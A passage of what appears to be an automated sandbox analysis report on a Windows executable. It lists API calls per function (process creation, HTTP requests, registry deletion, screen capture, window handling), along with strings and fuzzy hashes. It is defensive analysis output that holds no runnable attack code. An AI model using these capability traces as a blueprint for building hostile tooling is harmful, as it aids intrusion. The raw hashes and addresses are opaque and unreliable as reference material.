                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F6642A
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F66433
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6649A
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00F664D6
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F664DC
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F664E3
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F6653A
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F66547
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F6656C
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F66596
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d083583081599040ac524d4641d74f0b93589a6fc0f61ea1fb2c6f2c0804aee8
                                                                                                                                                                                                                                                                                        • Instruction ID: 1b7505605fff7e359a1d797bc3a841c7a80baa5b59e0c45049245f373259659e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d083583081599040ac524d4641d74f0b93589a6fc0f61ea1fb2c6f2c0804aee8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F716F31900609AFDB20DFA8CE85B6EBBF5FF48714F100519E586E26A0DB75ED44EB50
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00F80884
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00F8088F
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F8089A
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00F808A5
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00F808B0
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00F808BB
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00F808C6
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00F808D1
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00F808DC
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00F808E7
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00F808F2
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00F808FD
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00F80908
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00F80913
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00F8091E
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00F80929
                                                                                                                                                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 00F80939
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F8097B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F20436
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00FD170C,00000FA0,302581DA,?,?,?,?,00F42733,000000FF), ref: 00F2048C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F42733,000000FF), ref: 00F20497
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F42733,000000FF), ref: 00F204A8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F204BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F204CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F204DA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F20505
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F20510
                                                                                                                                                                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00F20457
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F20413: __onexit.LIBCMT ref: 00F20419
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • kernel32.dll, xrefs: 00F204A3
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable, xrefs: 00F204B8
                                                                                                                                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 00F204C4
                                                                                                                                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 00F204D2
                                                                                                                                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F20492
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                        • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,00F9DCD0), ref: 00F74F6C
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F74F80
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F74FDE
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F75039
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F75084
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F750EC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FD52: _wcslen.LIBCMT ref: 00F1FD5D
                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00FC7C10,00000061), ref: 00F75188
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                        • Opcode ID: 371887af8bef4a78e81d56ef1cb4c842b65dfc73c9603b5ea43205892c15d66d
                                                                                                                                                                                                                                                                                        • Instruction ID: 473f8fa430a4a41917cc92f93067b76f82a3ad7e11e5f3a3763fe78ae95901ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 371887af8bef4a78e81d56ef1cb4c842b65dfc73c9603b5ea43205892c15d66d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47B1D631A087029FC710DF28D891A6AB7E5AF94B20F50891EF49987291D7B4DC44EB93
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BBF8
                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC10
                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC34
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BC60
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC74
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC96
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BD92
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F70F4E: GetStdHandle.KERNEL32(000000F6), ref: 00F70F6D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BDAB
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BDC6
                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8BE16
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00F8BE67
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F8BE99
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8BEAA
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8BEBC
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8BECE
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F8BF43
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c0f7bc41dc2ebb87b6140fa2f3b2235f5ab7e0f3b17450a9b1b2ecc7053050c6
                                                                                                                                                                                                                                                                                        • Instruction ID: 96f21e86b7719053a017cca2442ee8f4469e6ef96cabb49f9000574d61cb2158
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0f7bc41dc2ebb87b6140fa2f3b2235f5ab7e0f3b17450a9b1b2ecc7053050c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F1B072A04340DFD714EF24C891BAABBE1BF85320F18855DF4858B2A2CB75EC45EB52
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F9DCD0), ref: 00F84B18
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F84B2A
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00F9DCD0), ref: 00F84B4F
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00F9DCD0), ref: 00F84B9B
                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,00F9DCD0), ref: 00F84C05
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 00F84CBF
                                                                                                                                                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F84D25
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F84D4F
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                        • Opcode ID: 786b349e90760031a233a9fd70aa1715931e7f531423d87e23364f73c1f69a5c
                                                                                                                                                                                                                                                                                        • Instruction ID: d4fe9810c62f12b91b2f4b823135dd45a55ce536538c1f1bea3ad4146771aabf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 786b349e90760031a233a9fd70aa1715931e7f531423d87e23364f73c1f69a5c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26122B71A0021AEFDB14DF94C884EAABBB9FF85314F248098E9059B251D735FD46DBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00FD29C0), ref: 00F43F72
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00FD29C0), ref: 00F44022
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F44066
                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00F4406F
                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(00FD29C0,00000000,?,00000000,00000000,00000000), ref: 00F44082
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F4408E
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00F97823
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F97897
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F978B9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F978CC
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F978ED
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F9791C
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F97935
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F9794E
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F97955
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F9796D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F97985
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F02234: GetWindowLongW.USER32(?,000000EB), ref: 00F02242
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00F99BA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F980AE: ClientToScreen.USER32(?,?), ref: 00F980D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F980AE: GetWindowRect.USER32(?,?), ref: 00F9814A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F980AE: PtInRect.USER32(?,?,?), ref: 00F9815A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F99C0C
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F99C17
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F99C3A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F99C81
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F99C9A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99CB1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99CD3
                                                                                                                                                                                                                                                                                        • DragFinish.SHELL32(?), ref: 00F99CDA
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00F99DCD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7CEF5
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7CF08
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7CF1C
                                                                                                                                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F7CF35
                                                                                                                                                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F7CF78
                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F7CF8E
                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7CF99
                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7CFC9
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7D021
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7D035
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F7D040
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F966D6,?,?), ref: 00F98FEE
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F98FFE
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99009
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99016
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F99024
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99033
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F9903C
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99043
                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99054
                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FA0C04,?), ref: 00F9906D
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F9907D
                                                                                                                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9909D
                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00F990CD
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F990F5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F9910B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C154
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8C1D2
                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00F8C26A
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8C2DE
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8C2FC
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F8C352
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8C364
                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8C382
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F8C3E3
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8C3F4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F83035
                                                                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F83045
                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00F83051
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00F8305E
                                                                                                                                                                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F830CA
                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F83109
                                                                                                                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F8312D
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00F83135
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00F8313E
                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00F83145
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00F83150
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                        • Opcode ID: e74a467adf6e1be6d8bd38ee5a397563ea5ae1dffe72b887b191938ee7546881
                                                                                                                                                                                                                                                                                        • Instruction ID: 4fa9c5d8ed64e50817910e985083bb71276bfd398d423a81600b4efd3b1d1214
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e74a467adf6e1be6d8bd38ee5a397563ea5ae1dffe72b887b191938ee7546881
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1161F2B6D00219AFCF04DFA8DC85EAEBBB5FF48710F20841AE555A7210D775AA41DF90
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00F9A990
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00F9A9A7
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F9A9B3
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00F9A9C9
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00F9AC15
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F9AC33
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F9AC54
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00F9AC73
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F9AC95
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 00F9ACBB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 3b8441142f5105456ba74b05205de2134756a541f2f0d24eb2d72727c27b4e5f
                                                                                                                                                                                                                                                                                        • Instruction ID: d4433bfeb4b5045e14a2fc16497ec1052d67080fa758b7deab00808cb077dc26
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b8441142f5105456ba74b05205de2134756a541f2f0d24eb2d72727c27b4e5f
